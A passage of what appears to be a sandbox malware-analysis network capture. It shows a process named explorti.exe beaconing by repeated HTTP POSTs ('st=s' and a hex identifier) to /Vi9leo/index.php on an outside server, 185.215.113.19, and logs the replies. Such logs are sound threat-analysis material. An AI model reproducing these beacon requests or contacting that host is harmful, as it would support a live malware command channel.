                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:17.679668903 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.656733185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:17.841272116 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:18.616157055 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:18.616918087 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:18.867109060 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.656734185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:18.982214928 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:19.776700020 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:19.777502060 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:20.094575882 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.656736185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:20.223192930 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:21.623913050 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:21.626487970 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:21.627491951 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:21.628906012 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:21.888231039 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.656737185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:21.997720003 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:22.774511099 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:22.775187969 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:23.063530922 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.656738185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:23.185091019 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:23.963273048 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:23.963886976 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:24.216413975 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.656739185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:24.343425035 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:25.119050026 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:25.119983912 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:25.378475904 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.656740185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:25.497910976 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:26.321660995 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:26.322424889 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:26.571166039 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.656741185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:26.853394985 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:27.739897013 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:27.740966082 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:27.988502026 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.656742185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:28.107878923 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:28.896280050 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:28.897192001 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:29.144112110 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.656743185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:29.264136076 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:30.015011072 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:30.015888929 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:30.263047934 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.656744185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:30.377094984 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:31.134143114 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:31.135096073 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:31.383564949 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.656745185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:31.500416994 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
